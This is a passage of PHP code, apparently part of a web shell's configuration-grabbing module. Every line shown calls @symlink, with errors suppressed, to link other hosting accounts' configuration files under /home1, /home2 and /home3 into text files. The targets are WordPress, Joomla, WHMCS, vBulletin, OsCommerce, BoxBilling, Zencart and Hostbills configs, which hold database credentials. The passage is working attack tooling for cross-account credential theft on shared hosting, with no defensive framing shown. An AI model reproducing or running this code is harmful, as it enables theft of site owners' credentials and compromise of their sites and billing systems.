  1057. @symlink('/home1/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1058. @symlink('/home1/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1059. @symlink('/home1/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1060. @symlink('/home1/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1061. @symlink('/home1/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1062. @symlink('/home1/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1063. @symlink('/home1/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1064. @symlink('/home1/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1065. @symlink('/home1/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1066. @symlink('/home1/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1067. @symlink('/home1/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1068. @symlink('/home1/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1069. @symlink('/home1/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1070. @symlink('/home1/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1071. @symlink('/home1/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1072. @symlink('/home1/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1073. @symlink('/home1/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1074. @symlink('/home1/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1075. @symlink('/home1/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1076. @symlink('/home1/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1077. @symlink('/home1/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1078. @symlink('/home1/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1079. @symlink('/home1/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1080. @symlink('/home1/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1081. @symlink('/home1/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1082. @symlink('/home1/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1083. @symlink('/home1/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1084.  
  1085. //Home2
  1086.  
  1087. @symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1088. @symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1089. @symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1090. @symlink('/home2/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1091. @symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1092. @symlink('/home2/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1093. @symlink('/home2/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1094. @symlink('/home2/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1095. @symlink('/home2/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1096. @symlink('/home2/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1097. @symlink('/home2/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1098. @symlink('/home2/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1099. @symlink('/home2/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1100. @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1101. @symlink('/home2/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1102. @symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1103. @symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1104. @symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1105. @symlink('/home2/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1106. @symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1107. @symlink('/home2/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1108. @symlink('/home2/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1109. @symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1110. @symlink('/home2/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1111. @symlink('/home2/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1112. @symlink('/home2/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1113. @symlink('/home2/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1114. @symlink('/home2/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1115. @symlink('/home2/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1116. @symlink('/home2/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1117. @symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1118. @symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1119. @symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1120. @symlink('/home2/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1121. @symlink('/home2/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1122. @symlink('/home2/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1123. @symlink('/home2/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1124. @symlink('/home2/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1125. @symlink('/home2/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1126. @symlink('/home2/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1127. @symlink('/home2/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1128. @symlink('/home2/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1129. @symlink('/home2/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1130. @symlink('/home2/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1131. @symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1132. @symlink('/home2/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1133. @symlink('/home2/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1134. @symlink('/home2/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1135. @symlink('/home2/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1136. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1137. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1138. @symlink('/home2/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1139. @symlink('/home2/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1140. @symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1141. @symlink('/home2/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1142. @symlink('/home2/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1143. @symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1144. @symlink('/home2/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1145. @symlink('/home2/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1146. @symlink('/home2/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1147. @symlink('/home2/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1148. @symlink('/home2/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1149. @symlink('/home2/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1150. @symlink('/home2/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1151. @symlink('/home2/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1152. @symlink('/home2/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1153. @symlink('/home2/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1154. @symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1155. @symlink('/home2/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1156. @symlink('/home2/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1157. @symlink('/home2/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1158. @symlink('/home2/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1159. @symlink('/home2/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1160. @symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1161. @symlink('/home2/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1162. @symlink('/home2/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1163. @symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1164. @symlink('/home2/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1165. @symlink('/home2/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1166. @symlink('/home2/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1167. @symlink('/home2/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1168. @symlink('/home2/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1169. @symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1170. @symlink('/home2/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1171. @symlink('/home2/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1172. @symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1173. @symlink('/home2/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1174. @symlink('/home2/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1175. @symlink('/home2/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1176. @symlink('/home2/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1177. @symlink('/home2/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1178. @symlink('/home2/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1179. @symlink('/home2/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1180. @symlink('/home2/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1181. @symlink('/home2/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1182. @symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1183. @symlink('/home2/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1184. @symlink('/home2/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1185. @symlink('/home2/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1186. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1187. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1188. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1189. @symlink('/home2/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1190. @symlink('/home2/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1191. @symlink('/home2/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1192. @symlink('/home2/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1193. @symlink('/home2/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1194. @symlink('/home2/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1195. @symlink('/home2/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1196. @symlink('/home2/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1197. @symlink('/home2/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1198. @symlink('/home2/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1199. @symlink('/home2/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1200. @symlink('/home2/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1201. @symlink('/home2/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1202. @symlink('/home2/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1203. @symlink('/home2/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1204. @symlink('/home2/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1205. @symlink('/home2/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1206. @symlink('/home2/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1207. @symlink('/home2/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1208. @symlink('/home2/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1209. @symlink('/home2/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1210. @symlink('/home2/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1211. @symlink('/home2/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1212. @symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1213. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1214. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1215. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1216. @symlink('/home2/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1217. @symlink('/home2/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1218. @symlink('/home2/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1219. @symlink('/home2/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1220. @symlink('/home2/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1221. @symlink('/home2/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1222. @symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1223. @symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1224. @symlink('/home2/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1225. @symlink('/home2/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1226. @symlink('/home2/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1227. @symlink('/home2/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1228. @symlink('/home2/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1229. @symlink('/home2/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1230. @symlink('/home2/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1231. @symlink('/home2/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1232. @symlink('/home2/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1233. @symlink('/home2/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1234. @symlink('/home2/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1235. @symlink('/home2/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1236. @symlink('/home2/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1237. @symlink('/home2/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1238. @symlink('/home2/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1239. @symlink('/home2/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1240. @symlink('/home2/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1241. @symlink('/home2/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1242. @symlink('/home2/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1243. @symlink('/home2/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1244. @symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1245. @symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1246. @symlink('/home2/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1247. @symlink('/home2/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1248. @symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1249. @symlink('/home2/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1250. @symlink('/home2/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1251. @symlink('/home2/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1252. @symlink('/home2/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1253. @symlink('/home2/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1254. @symlink('/home2/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1255. @symlink('/home2/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1256. @symlink('/home2/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1257. @symlink('/home2/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1258. @symlink('/home2/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1259. @symlink('/home2/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1260. @symlink('/home2/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1261. @symlink('/home2/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1262. @symlink('/home2/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1263. @symlink('/home2/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1264. @symlink('/home2/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1265. @symlink('/home2/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1266. @symlink('/home2/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1267.  
  1268. //Home3
  1269.  
  1270. @symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1271. @symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1272. @symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1273. @symlink('/home3/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1274. @symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1275. @symlink('/home3/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1276. @symlink('/home3/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1277. @symlink('/home3/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1278. @symlink('/home3/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1279. @symlink('/home3/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1280. @symlink('/home3/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1281. @symlink('/home3/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1282. @symlink('/home3/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1283. @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1284. @symlink('/home3/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1285. @symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1286. @symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1287. @symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1288. @symlink('/home3/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1289. @symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1290. @symlink('/home3/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1291. @symlink('/home3/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1292. @symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1293. @symlink('/home3/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1294. @symlink('/home3/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1295. @symlink('/home3/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1296. @symlink('/home3/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1297. @symlink('/home3/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1298. @symlink('/home3/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1299. @symlink('/home3/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1300. @symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1301. @symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1302. @symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1303. @symlink('/home3/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1304. @symlink('/home3/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1305. @symlink('/home3/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1306. @symlink('/home3/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1307. @symlink('/home3/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1308. @symlink('/home3/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1309. @symlink('/home3/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1310. @symlink('/home3/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1311. @symlink('/home3/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1312. @symlink('/home3/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1313. @symlink('/home3/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1314. @symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1315. @symlink('/home3/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1316. @symlink('/home3/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1317. @symlink('/home3/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1318. @symlink('/home3/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1319. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1320. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1321. @symlink('/home3/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1322. @symlink('/home3/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1323. @symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1324. @symlink('/home3/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1325. @symlink('/home3/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1326. @symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1327. @symlink('/home3/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1328. @symlink('/home3/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1329. @symlink('/home3/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1330. @symlink('/home3/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1331. @symlink('/home3/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1332. @symlink('/home3/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1333. @symlink('/home3/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1334. @symlink('/home3/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1335. @symlink('/home3/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1336. @symlink('/home3/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1337. @symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1338. @symlink('/home3/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1339. @symlink('/home3/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1340. @symlink('/home3/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1341. @symlink('/home3/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1342. @symlink('/home3/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1343. @symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1344. @symlink('/home3/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1345. @symlink('/home3/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1346. @symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1347. @symlink('/home3/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1348. @symlink('/home3/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1349. @symlink('/home3/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1350. @symlink('/home3/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1351. @symlink('/home3/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1352. @symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1353. @symlink('/home3/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1354. @symlink('/home3/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1355. @symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1356. @symlink('/home3/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1357. @symlink('/home3/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1358. @symlink('/home3/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1359. @symlink('/home3/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1360. @symlink('/home3/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1361. @symlink('/home3/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1362. @symlink('/home3/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1363. @symlink('/home3/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1364. @symlink('/home3/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
